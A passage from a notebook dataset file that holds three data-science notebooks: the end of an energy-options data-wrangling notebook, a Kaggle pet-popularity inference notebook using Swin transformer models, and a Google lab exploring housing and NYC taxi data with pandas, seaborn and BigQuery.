"WTI_IV_21_df = pd.read_csv(orig_data_dir+\"WTI_ImpliedVols2021.csv\")\nWTI_IV_21_df.head()",
"_____no_output_____"
],
[
"WTI_IV_21_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 35134 entries, 0 to 35133\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 volatilityindex 35134 non-null object \n 1 volatilitydate 35134 non-null object \n 2 strikeprice 35134 non-null float64\n 3 begtime 35134 non-null object \n 4 volatility 35134 non-null float64\ndtypes: float64(2), object(3)\nmemory usage: 1.3+ MB\n"
],
[
"WTI_IV_22_df = pd.read_csv(orig_data_dir+\"WTI_ImpliedVols2022.csv\")\nWTI_IV_22_df.head()",
"_____no_output_____"
],
[
"WTI_IV_22_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 9639 entries, 0 to 9638\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 volatilityindex 9639 non-null object \n 1 volatilitydate 9639 non-null object \n 2 strikeprice 9639 non-null float64\n 3 begtime 9639 non-null object \n 4 volatility 9639 non-null float64\ndtypes: float64(2), object(3)\nmemory usage: 376.6+ KB\n"
],
[
"frames = [WTI_IV_20_df, WTI_IV_21_df, WTI_IV_22_df]\nWTI_IV_df = pd.concat(frames)\n\ndel frames",
"_____no_output_____"
],
[
"WTI_IV_df.rename(columns={\"volatilityindex\" : \"index\", \"volatilitydate\" : \"t\", \"strikeprice\" : \"K\",\n \"begtime\" : \"T\", \"volatility\" : \"sigma\"}, inplace=True)\nWTI_IV_df = WTI_IV_df[[\"index\", \"t\", \"T\", \"K\", \"sigma\"]]\nWTI_IV_df[\"index\"] = \"WTI NYMEX LIGHT SWEET\"\nWTI_IV_df.head()",
"_____no_output_____"
],
[
"WTI_IV_df[\"t\"], WTI_IV_df[\"T\"] = pd.to_datetime(WTI_IV_df[\"t\"]), pd.to_datetime(WTI_IV_df[\"T\"])\nWTI_IV_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 77741 entries, 0 to 9638\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 index 77741 non-null object \n 1 t 77741 non-null datetime64[ns]\n 2 T 77741 non-null datetime64[ns]\n 3 K 77741 non-null float64 \n 4 sigma 77741 non-null float64 \ndtypes: datetime64[ns](2), float64(2), object(1)\nmemory usage: 3.6+ MB\n"
],
[
"for i in [\"t\", \"T\"]:\n print(i + \"_min is \" + str(min(WTI_IV_df[i]).date()) + \"\\t\" + i + \"_max is \" + str(max(WTI_IV_df[i]).date())\n + \"\\n\")\ndel i",
"t_min is 2020-03-02\tt_max is 2020-05-29\n\nT_min is 2020-04-01\tT_max is 2022-12-01\n\n"
],
[
"IR_df = pd.read_csv(orig_data_dir+\"InterestRates.csv\")\nIR_df.head()",
"_____no_output_____"
],
[
"IR_df.pricedate = pd.to_datetime(IR_df.pricedate)\nIR_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 7085 entries, 0 to 7084\nData columns (total 3 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 pricedate 7085 non-null datetime64[ns]\n 1 maturity 7085 non-null object \n 2 bidrate 7085 non-null float64 \ndtypes: datetime64[ns](1), float64(1), object(1)\nmemory usage: 166.2+ KB\n"
],
[
"t = IR_df.pricedate.to_list()\nttm = [to_offset(i) for i in IR_df.maturity]\nT = [t[i] + ttm[i] + to_offset(\"1D\") for i in range(len(ttm))]\nIR_df.maturity = T",
"_____no_output_____"
],
[
"IR_df.head()",
"_____no_output_____"
],
[
"IR_df.rename(columns={\"pricedate\" : \"t\", \"maturity\" : \"T\", \"bidrate\": \"r\"}, inplace=True)\nIR_df.head()",
"_____no_output_____"
],
[
"for i in [\"t\", \"T\"]:\n print(i + \"_min is \" + str(min(IR_df[i]).date()) + \"\\t\" + i + \"_max is \" + str(max(IR_df[i]).date())\n + \"\\n\")\ndel i",
"t_min is 2020-03-02\tt_max is 2020-05-29\n\nT_min is 2020-04-01\tT_max is 2029-06-01\n\n"
],
[
"NG_IV_df.set_index([\"t\", \"T\"], inplace=True)\nWTI_IV_df.set_index([\"t\", \"T\"], inplace=True)\nIR_df.set_index([\"t\", \"T\"], inplace=True)",
"_____no_output_____"
],
[
"NG_option_df = NG_IV_df.merge(IR_df, how=\"inner\", left_index=True, right_index=True)\nNG_option_df.drop(columns=\"index\", inplace=True)\nNG_option_df.reset_index(inplace=True)\nNG_option_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 152857 entries, 0 to 152856\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 t 152857 non-null datetime64[ns]\n 1 T 152857 non-null datetime64[ns]\n 2 K 152857 non-null float64 \n 3 sigma 152857 non-null float64 \n 4 r 152857 non-null float64 \ndtypes: datetime64[ns](2), float64(3)\nmemory usage: 5.8 MB\n"
],
[
"NG_option_df.to_csv(r\"./data/wrangled_data/NG_option.csv\", index=False)",
"_____no_output_____"
],
[
"WTI_option_df = WTI_IV_df.merge(IR_df, how=\"inner\", left_index=True, right_index=True)\nWTI_option_df.drop(columns=\"index\", inplace=True)\nWTI_option_df.reset_index(inplace=True)\nWTI_option_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 79354 entries, 0 to 79353\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 t 79354 non-null datetime64[ns]\n 1 T 79354 non-null datetime64[ns]\n 2 K 79354 non-null float64 \n 3 sigma 79354 non-null float64 \n 4 r 79354 non-null float64 \ndtypes: datetime64[ns](2), float64(3)\nmemory usage: 3.0 MB\n"
],
[
"WTI_option_df.to_csv(r\"./data/wrangled_data/WTI_option.csv\", index=False)",
"_____no_output_____"
],
[
"print(*os.listdir(\"./data/wrangled_data/\"), sep=\"\\n\")",
"WTI_futures.csv\nNG_option.csv\nWTI_option.csv\nAECO_futures.csv\nNG_futures.csv\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb036f3824cc4fa3f9c3788d56cbf2ac739ed458 | 19,128 | ipynb | Jupyter Notebook | tez-inference(1).ipynb | av192/Pet-Popularity-Prediction | fb4e5894ac3f9b2868fae21862acc7f247eb8b5f | [
"MIT"
] | null | null | null | tez-inference(1).ipynb | av192/Pet-Popularity-Prediction | fb4e5894ac3f9b2868fae21862acc7f247eb8b5f | [
"MIT"
] | null | null | null | tez-inference(1).ipynb | av192/Pet-Popularity-Prediction | fb4e5894ac3f9b2868fae21862acc7f247eb8b5f | [
"MIT"
] | null | null | null | 33.382199 | 161 | 0.530374 | [
[
[
"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the read-only \"../input/\" directory\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\n\nimport os\n\n\n# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using \"Save & Run All\" \n# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session",
"_____no_output_____"
],
[
"import sys\nsys.path.append(\"../input/tez-lib/\")\nsys.path.append(\"../input/timmmaster/\")\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport os\nimport torch\nimport torchvision\nimport sklearn\n%matplotlib inline\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as transforms\nfrom torchvision.io import read_image\nimport math\n\ntest_csv = pd.read_csv('../input/petfinder-pawpularity-score/test.csv')\nsubmission = pd.read_csv('../input/petfinder-pawpularity-score/sample_submission.csv')\n\ntest_dir = '../input/petfinder-pawpularity-score/test/'\n\ndef create_path(df,root_dir):\n df['Path'] = df['Id'].apply(lambda x: root_dir+x+'.jpg')\n \n \n \n \ncreate_path(test_csv,test_dir)\n\n# Create Label column (used later)\ntest_csv['Pawpularity'] = 100 ",
"_____no_output_____"
],
[
"def sigmoid(x):\n return 1 / (1 + math.exp(-x))\n\nclass CustomDataSet(Dataset):\n \n def __init__(self,csv_file,transform=None,augment_transform=None,root_dir ='../input/petfinder-pawpularity-score/train/' ):\n self.csv_file = csv_file\n self.transform = transform\n self.augment_trans = augment_transform\n self.root_dir = root_dir\n self.img_paths = self._get_img_paths(self.csv_file, root_dir)\n \n def __len__(self):\n return int(self.csv_file.shape[0])\n \n def __getitem__(self,idx):\n img_path = self.img_paths[idx]\n image = read_image(img_path)\n label = self.csv_file.Pawpularity.iloc[idx]/100\n image = image.type(torch.FloatTensor)\n \n if self.transform:\n image = self.transform(image)\n if self.augment_trans:\n image = self.augment_transform(image)\n \n image = torch.mul(image, (1/255))\n return {'image':image,'targets':label}\n \n def _get_img_paths(self,csv_file,root_dir):\n imgs = csv_file['Id'].apply(lambda x: root_dir+x+'.jpg').tolist()\n return imgs\n \n \n \n\nfrom torch.utils.data.sampler import SubsetRandomSampler\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\ntransform = transforms.Compose([\n normalize,\n transforms.Resize(255),\n transforms.CenterCrop(224)])\n\n\n\ntest_data = CustomDataSet(test_csv,transform,root_dir = test_dir) ",
"_____no_output_____"
],
[
"#!pip install timm\n#!pip install tez\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\nprint(device)\n\n\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torchvision import models\nimport time\nimport copy\n\nimport timm\nfrom tez.callbacks import EarlyStopping\n\n\nimport tez\nfrom tqdm import tqdm\n",
"cuda:0\n"
],
[
"import sys\nsys.path.append(\"../input/tez-lib/\")\nsys.path.append(\"../input/timmmaster/\")\nimport tez\nimport timm\n\nfrom tez.callbacks import EarlyStopping\n#sys.path.append(\"../input/tez-lib\")\n#sys.path.append(\"../input/timmmaster\")\nfrom sklearn import metrics\n\ndef mixup_loss(loss_fn, pred, y_a, y_b, lam):\n # get loss from current x n loss from watermarks n add\n return lam * loss_fn(pred, y_a) + (1 - lam) * loss_fn(pred, y_b)\n\nclass PawpularModel(tez.Model):\n def __init__(self,name):\n super().__init__()\n \n self.model = timm.create_model(name, pretrained=False, in_chans=3)\n self.model.head = nn.Linear(self.model.head.in_features, 128)\n self.dropout = nn.Dropout(p=0.5)\n self.dense1 = nn.Linear(128,1)\n \n self.step_scheduler_after = 'epoch'\n \n \n \n def forward(self, image, targets=None): \n # do mixup when have targets and state is train (doesnt do mixup at val)\n if ((targets is not None) and (self._train_state == True)):\n #image, features, target_a, target_b, lam = mixup_data(image, features, targets.view(-1,1)) \n image = image.to(device='cuda', dtype=torch.float)\n features = features.to(device='cuda', dtype=torch.float)\n target_a = target_a.to(device='cuda', dtype=torch.float)\n target_b = target_b.to(device='cuda', dtype=torch.float)\n x = self.model(image)\n x = self.dropout(x)\n # combine with meta features and shrink it down to 1 feature (score)\n \n x = self.dense1(x)\n \n \n \n return x, 0, {}",
"_____no_output_____"
],
[
"#model = timm.create_model(\"swin_large_patch4_window12_384\",pretrained=True)",
"_____no_output_____"
],
[
"super_final_predictions = []\nsys.path.append(\"../input/tez-lib/\")\nsys.path.append(\"../input/timmmaster/\")\nfor fold_ in range(5):\n model = PawpularModel(\"swin_tiny_patch4_window7_224\")\n model.load(f\"../input/kfold-pet1/swin_tiny_patch4_window7_224_f{fold_}.bin\", device=\"cuda\", weights_only=True)\n\n df_test = pd.read_csv(\"../input/petfinder-pawpularity-score/test.csv\")\n #test_img_paths = [f\"../input/petfinder-pawpularity-score/test/{x}.jpg\" for x in df_test[\"Id\"].values]\n\n \n\n test_dataset = CustomDataSet(\n test_csv,transform,root_dir=test_dir\n )\n test_predictions = model.predict(test_dataset, batch_size=32, n_jobs=-1)\n\n final_test_predictions = []\n for preds in tqdm(test_predictions):\n final_test_predictions.extend(preds.ravel().tolist())\n\n final_test_predictions = [sigmoid(x) * 100 for x in final_test_predictions]\n super_final_predictions.append(final_test_predictions)\n\nsuper_final_predictions = np.mean(np.column_stack(super_final_predictions), axis=1)\ndf_test[\"Pawpularity\"] = super_final_predictions\ndf_test = df_test[[\"Id\", \"Pawpularity\"]]\ndf_test.to_csv(\"submission.csv\", index=False)",
"0it [00:00, ?it/s]\n1it [00:06, 6.19s/it]\n 0%| | 0/1 [00:06<?, ?it/s, stage=test]\u001b[A\n100%|██████████| 1/1 [00:06<00:00, 6.22s/it, stage=test]\n1it [00:06, 6.23s/it]\n0it [00:00, ?it/s]\n1it [00:00, 7.26it/s]\n 0%| | 0/1 [00:00<?, ?it/s, stage=test]\u001b[A\n100%|██████████| 1/1 [00:00<00:00, 5.43it/s, stage=test]\n1it [00:00, 5.17it/s]\n0it [00:00, ?it/s]\n1it [00:00, 7.48it/s]\n 0%| | 0/1 [00:00<?, ?it/s, stage=test]\u001b[A\n100%|██████████| 1/1 [00:00<00:00, 5.72it/s, stage=test]\n1it [00:00, 5.41it/s]\n0it [00:00, ?it/s]\n1it [00:00, 7.30it/s]\n 0%| | 0/1 [00:00<?, ?it/s, stage=test]\u001b[A\n100%|██████████| 1/1 [00:00<00:00, 5.51it/s, stage=test]\n1it [00:00, 5.21it/s]\n0it [00:00, ?it/s]\n1it [00:00, 7.45it/s]\n 0%| | 0/1 [00:00<?, ?it/s, stage=test]\u001b[A\n100%|██████████| 1/1 [00:00<00:00, 5.51it/s, stage=test]\n1it [00:00, 5.20it/s]\n"
],
[
"df_test",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0381815d36ac1201d425c1a38c71203fd00d5a | 312,896 | ipynb | Jupyter Notebook | courses/machine_learning/deepdive2/launching_into_ml/solutions/python.BQ_explore_data.ipynb | shivchamkure/training-data-analyst | abee8f722970e9060549d13fbd3a0a44a720bfe7 | [
"Apache-2.0"
] | 6,140 | 2016-05-23T16:09:35.000Z | 2022-03-30T19:00:46.000Z | courses/machine_learning/deepdive2/launching_into_ml/solutions/python.BQ_explore_data.ipynb | shivchamkure/training-data-analyst | abee8f722970e9060549d13fbd3a0a44a720bfe7 | [
"Apache-2.0"
] | 1,384 | 2016-07-08T22:26:41.000Z | 2022-03-24T16:39:43.000Z | courses/machine_learning/deepdive2/launching_into_ml/solutions/python.BQ_explore_data.ipynb | shivchamkure/training-data-analyst | abee8f722970e9060549d13fbd3a0a44a720bfe7 | [
"Apache-2.0"
] | 5,110 | 2016-05-27T13:45:18.000Z | 2022-03-31T18:40:42.000Z | 153.305243 | 66,448 | 0.854319 | [
[
[
"# Exploratory Data Analysis Using Python and BigQuery\n\n\n\n## Learning Objectives\n\n1. Analyze a Pandas Dataframe\n2. Create Seaborn plots for Exploratory Data Analysis in Python \n3. Write a SQL query to pick up specific fields from a BigQuery dataset\n4. Exploratory Analysis in BigQuery\n\n\n## Introduction \nThis lab is an introduction to linear regression using Python and Scikit-Learn. This lab serves as a foundation for more complex algorithms and machine learning models that you will encounter in the course. We will train a linear regression model to predict housing price.\n\nEach learning objective will correspond to a __#TODO__ in the [student lab notebook](../labs/python.BQ_explore_data.ipynb) -- try to complete that notebook first before reviewing this solution notebook. \n",
"_____no_output_____"
],
[
"### Import Libraries",
"_____no_output_____"
]
],
[
[
"# Run the chown command to change the ownership\n!sudo chown -R jupyter:jupyter /home/jupyter/training-data-analyst",
"_____no_output_____"
],
[
"# Install the Google Cloud BigQuery library\n!pip install --user google-cloud-bigquery==1.25.0",
"_____no_output_____"
]
],
[
[
"Please ignore any incompatibility warnings and errors.\n",
"_____no_output_____"
],
[
"**Restart** the kernel before proceeding further (On the Notebook menu - Kernel - Restart Kernel).\n",
"_____no_output_____"
]
],
[
[
"# You can use any Python source file as a module by executing an import statement in some other Python source file.\n# The import statement combines two operations; it searches for the named module, then it binds the results of that search\n# to a name in the local scope.\nimport os \nimport pandas as pd\nimport numpy as np\n# Import matplotlib to visualize the model\nimport matplotlib.pyplot as plt\n# Seaborn is a Python data visualization library based on matplotlib\nimport seaborn as sns\n%matplotlib inline ",
"_____no_output_____"
]
],
[
[
"### Load the Dataset\n\n",
"_____no_output_____"
],
[
"Here, we create a directory called usahousing. This directory will hold the dataset that we copy from Google Cloud Storage.",
"_____no_output_____"
]
],
[
[
"# Create a directory to hold the dataset\nif not os.path.isdir(\"../data/explore\"):\n os.makedirs(\"../data/explore\")",
"_____no_output_____"
]
],
[
[
"Next, we copy the Usahousing dataset from Google Cloud Storage.",
"_____no_output_____"
]
],
[
[
"# Copy the file using `gsutil cp` from Google Cloud Storage in the required directory\n!gsutil cp gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/housing_pre-proc_toy.csv ../data/explore ",
"Copying gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/housing_pre-proc_toy.csv...\n/ [1 files][138.8 KiB/138.8 KiB] \nOperation completed over 1 objects/138.8 KiB. \n"
]
],
[
[
"Then we use the \"ls\" command to list files in the directory. This ensures that the dataset was copied.",
"_____no_output_____"
]
],
[
[
"# `ls` shows the working directory's contents. \n# The `l` flag list the all files with permissions and details\n!ls -l ../data/explore",
"total 140\n-rw-r--r-- 1 jupyter jupyter 142150 Dec 24 11:35 housing_pre-proc_toy.csv\n"
]
],
[
[
"Next, we read the dataset into a Pandas dataframe.",
"_____no_output_____"
]
],
[
[
"# TODO 1\n# Read a comma-separated values (csv) file into a DataFrame using the read_csv() function\ndf_USAhousing = pd.read_csv('../data/explore/housing_pre-proc_toy.csv')",
"_____no_output_____"
]
],
[
[
"### Inspect the Data",
"_____no_output_____"
]
],
[
[
"# Get the first five rows using the head() method\n\ndf_USAhousing.head()",
"_____no_output_____"
]
],
[
[
"Let's check for any null values.",
"_____no_output_____"
]
],
[
[
"# `isnull()` finds a null value in a column and `sum()` counts it\ndf_USAhousing.isnull().sum()",
"_____no_output_____"
],
[
"# Get some basic statistical details using describe() method\ndf_stats = df_USAhousing.describe()\n# Transpose index and columns of the dataframe\ndf_stats = df_stats.transpose()\ndf_stats",
"_____no_output_____"
],
[
"# Get a concise summary of a DataFrame\ndf_USAhousing.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 2500 entries, 0 to 2499\nData columns (total 10 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 longitude 2500 non-null float64\n 1 latitude 2500 non-null float64\n 2 housing_median_age 2500 non-null int64 \n 3 total_rooms 2500 non-null int64 \n 4 total_bedrooms 2500 non-null int64 \n 5 population 2500 non-null int64 \n 6 households 2500 non-null int64 \n 7 median_income 2500 non-null float64\n 8 median_house_value 2500 non-null int64 \n 9 ocean_proximity 2500 non-null object \ndtypes: float64(3), int64(6), object(1)\nmemory usage: 195.4+ KB\n"
]
],
[
[
"Let's take a peek at the first and last five rows of the data for all columns.",
"_____no_output_____"
]
],
[
[
"print (\"Rows : \" ,df_USAhousing.shape[0])\nprint (\"Columns : \" ,df_USAhousing.shape[1])\nprint (\"\\nFeatures : \\n\" ,df_USAhousing.columns.tolist())\nprint (\"\\nMissing values : \", df_USAhousing.isnull().sum().values.sum())\nprint (\"\\nUnique values : \\n\",df_USAhousing\n .nunique())",
"Rows : 2500\nColumns : 10\n\nFeatures : \n ['longitude', 'latitude', 'housing_median_age', 'total_rooms', 'total_bedrooms', 'population', 'households', 'median_income', 'median_house_value', 'ocean_proximity']\n\nMissing values : 0\n\nUnique values : \nlongitude 265\nlatitude 275\nhousing_median_age 51\ntotal_rooms 1889\ntotal_bedrooms 922\npopulation 1520\nhouseholds 890\nmedian_income 2186\nmedian_house_value 1553\nocean_proximity 4\ndtype: int64\n"
]
],
[
[
"## Explore the Data\n\nLet's create some simple plots to check out the data! ",
"_____no_output_____"
]
],
[
[
"# `heatmap` plots a rectangular data in a color-encoded matrix and\n# `corr` finds the pairwise correlation of all columns in the dataframe\nsns.heatmap(df_USAhousing.corr())",
"_____no_output_____"
]
],
[
[
"Create a displot showing \"median_house_value\".",
"_____no_output_____"
]
],
[
[
"# TODO 2a\n# Plot a univariate distribution of observations using seaborn `distplot()` function\nsns.displot(df_USAhousing['median_house_value'])",
"_____no_output_____"
],
[
"# Set the aesthetic style of the plots\nsns.set_style('whitegrid')\n# Plot a histogram using `hist()` function\ndf_USAhousing['median_house_value'].hist(bins=30)\nplt.xlabel('median_house_value')",
"_____no_output_____"
],
[
"x = df_USAhousing['median_income']\ny = df_USAhousing['median_house_value']\n\n# Scatter plot of y vs x using scatter() and `show()` display all open figures\nplt.scatter(x, y)\nplt.show()",
"_____no_output_____"
]
],
[
[
"Create a jointplot showing \"median_income\" versus \"median_house_value\".",
"_____no_output_____"
]
],
[
[
"# TODO 2b\n# `joinplot()` draws a plot of two variables with bivariate and univariate graphs.\nsns.jointplot(x='median_income',y='median_house_value',data=df_USAhousing)",
"_____no_output_____"
],
[
"# `countplot()` shows the counts of observations in each categorical bin using bars\nsns.countplot(x = 'ocean_proximity', data=df_USAhousing)",
"_____no_output_____"
],
[
"# takes numeric only?\n# plt.figure(figsize=(20,20))\n# Draw a multi-plot on every facet using `FacetGrid()`\ng = sns.FacetGrid(df_USAhousing, col=\"ocean_proximity\")\n# Pass a function and the name of one or more columns in the dataframe\ng.map(plt.hist, \"households\");",
"_____no_output_____"
],
[
"# takes numeric only?\n# plt.figure(figsize=(20,20))\n# Draw a multi-plot on every facet using `FacetGrid()`\ng = sns.FacetGrid(df_USAhousing, col=\"ocean_proximity\")\n# Pass a function and the name of one or more columns in the dataframe\ng.map(plt.hist, \"median_income\");",
"_____no_output_____"
]
],
[
[
"You can see below that this is the state of California!",
"_____no_output_____"
]
],
[
[
"x = df_USAhousing['latitude']\ny = df_USAhousing['longitude']\n\n# Scatter plot of y vs x and display all open figures\nplt.scatter(x, y)\nplt.show()",
"_____no_output_____"
]
],
[
[
"# Explore and create ML datasets\n\nIn this notebook, we will explore data corresponding to taxi rides in New York City to build a Machine Learning model in support of a fare-estimation tool. The idea is to suggest a likely fare to taxi riders so that they are not surprised, and so that they can protest if the charge is much higher than expected.\n\n## Learning objectives\n* Access and explore a public BigQuery dataset on NYC Taxi Cab rides\n* Visualize your dataset using the Seaborn library\n\n\nFirst, **restart the Kernel**. Now, let's start with the Python imports that we need.",
"_____no_output_____"
]
],
[
[
"# Import the python libraries\nfrom google.cloud import bigquery\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"<h3> Extract sample data from BigQuery </h3>\n\nThe dataset that we will use is <a href=\"https://console.cloud.google.com/bigquery?project=nyc-tlc&p=nyc-tlc&d=yellow&t=trips&page=table\">a BigQuery public dataset</a>. Click on the link, and look at the column names. Switch to the Details tab to verify that the number of records is one billion, and then switch to the Preview tab to look at a few rows.\n\nLet's write a SQL query to pick up interesting fields from the dataset. It's a good idea to get the timestamp in a predictable format.",
"_____no_output_____"
]
],
[
[
"%%bigquery\n# SQL query to get a fields from dataset which prints the 10 records\nSELECT\n FORMAT_TIMESTAMP(\n \"%Y-%m-%d %H:%M:%S %Z\", pickup_datetime) AS pickup_datetime,\n pickup_longitude, pickup_latitude, dropoff_longitude,\n dropoff_latitude, passenger_count, trip_distance, tolls_amount, \n fare_amount, total_amount \n# TODO 3\nFROM\n `nyc-tlc.yellow.trips`\nLIMIT 10",
"_____no_output_____"
]
],
[
[
"Let's increase the number of records so that we can do some neat graphs. There is no guarantee about the order in which records are returned, and so no guarantee about which records get returned if we simply increase the LIMIT. To properly sample the dataset, let's use the HASH of the pickup time and return 1 in 100,000 records -- because there are 1 billion records in the data, we should get back approximately 10,000 records if we do this.\n\nWe will also store the BigQuery result in a Pandas dataframe named \"trips\"",
"_____no_output_____"
]
],
[
[
"%%bigquery trips\nSELECT\n FORMAT_TIMESTAMP(\n \"%Y-%m-%d %H:%M:%S %Z\", pickup_datetime) AS pickup_datetime,\n pickup_longitude, pickup_latitude, \n dropoff_longitude, dropoff_latitude,\n passenger_count,\n trip_distance,\n tolls_amount,\n fare_amount,\n total_amount\nFROM\n `nyc-tlc.yellow.trips`\nWHERE\n ABS(MOD(FARM_FINGERPRINT(CAST(pickup_datetime AS STRING)), 100000)) = 1",
"_____no_output_____"
],
[
"print(len(trips))",
"10789\n"
],
[
"# We can slice Pandas dataframes as if they were arrays\ntrips[:10]",
"_____no_output_____"
]
],
[
[
"<h3> Exploring data </h3>\n\nLet's explore this dataset and clean it up as necessary. We'll use the Python Seaborn package to visualize graphs and Pandas to do the slicing and filtering.",
"_____no_output_____"
]
],
[
[
"# TODO 4\n# Use Seaborn `regplot()` function to plot the data and a linear regression model fit.\nax = sns.regplot(\n x=\"trip_distance\", y=\"fare_amount\",\n fit_reg=False, ci=None, truncate=True, data=trips)\nax.figure.set_size_inches(10, 8)",
"_____no_output_____"
]
],
[
[
"Hmm ... do you see something wrong with the data that needs addressing?\n\nIt appears that we have a lot of invalid data that is being coded as zero distance and some fare amounts that are definitely illegitimate. Let's remove them from our analysis. We can do this by modifying the BigQuery query to keep only trips longer than zero miles and fare amounts that are at least the minimum cab fare ($2.50).\n\nNote the extra WHERE clauses.",
"_____no_output_____"
]
],
[
[
"%%bigquery trips\n# SQL query with where clause to save the results in the trips dataframe\nSELECT\n FORMAT_TIMESTAMP(\n \"%Y-%m-%d %H:%M:%S %Z\", pickup_datetime) AS pickup_datetime,\n pickup_longitude, pickup_latitude, \n dropoff_longitude, dropoff_latitude,\n passenger_count,\n trip_distance,\n tolls_amount,\n fare_amount,\n total_amount\nFROM\n `nyc-tlc.yellow.trips`\nWHERE\n ABS(MOD(FARM_FINGERPRINT(CAST(pickup_datetime AS STRING)), 100000)) = 1\n# TODO 4a\n AND trip_distance > 0\n AND fare_amount >= 2.5",
"_____no_output_____"
],
[
"print(len(trips))",
"10716\n"
],
[
"# Use Seaborn `regplot()` function to plot the data and a linear regression model fit.\nax = sns.regplot(\n x=\"trip_distance\", y=\"fare_amount\",\n fit_reg=False, ci=None, truncate=True, data=trips)\nax.figure.set_size_inches(10, 8)",
"_____no_output_____"
]
],
[
[
"What's up with the streaks around 45 dollars and 50 dollars? Those are fixed-amount rides from JFK and La Guardia airports into anywhere in Manhattan, i.e. to be expected. Let's list the data to make sure the values look reasonable.\n\nLet's also examine whether the toll amount is captured in the total amount.",
"_____no_output_____"
]
],
[
[
"tollrides = trips[trips[\"tolls_amount\"] > 0]\ntollrides[tollrides[\"pickup_datetime\"] == \"2012-02-27 09:19:10 UTC\"]",
"_____no_output_____"
],
[
"notollrides = trips[trips[\"tolls_amount\"] == 0]\nnotollrides[notollrides[\"pickup_datetime\"] == \"2012-02-27 09:19:10 UTC\"]",
"_____no_output_____"
]
],
[
[
"Looking at a few samples above, it should be clear that the total amount reflects fare amount, toll and tip somewhat arbitrarily -- this is because when customers pay cash, the tip is not known. So, we'll use the sum of fare_amount + tolls_amount as what needs to be predicted. Tips are discretionary and do not have to be included in our fare estimation tool.\n\nLet's also look at the distribution of values within the columns.",
"_____no_output_____"
]
],
[
[
"# Print the distribution of values within the columns using `describe()`\ntrips.describe()",
"_____no_output_____"
]
],
[
[
"Copyright 2021 Google Inc. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at\nhttp://www.apache.org/licenses/LICENSE-2.0\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
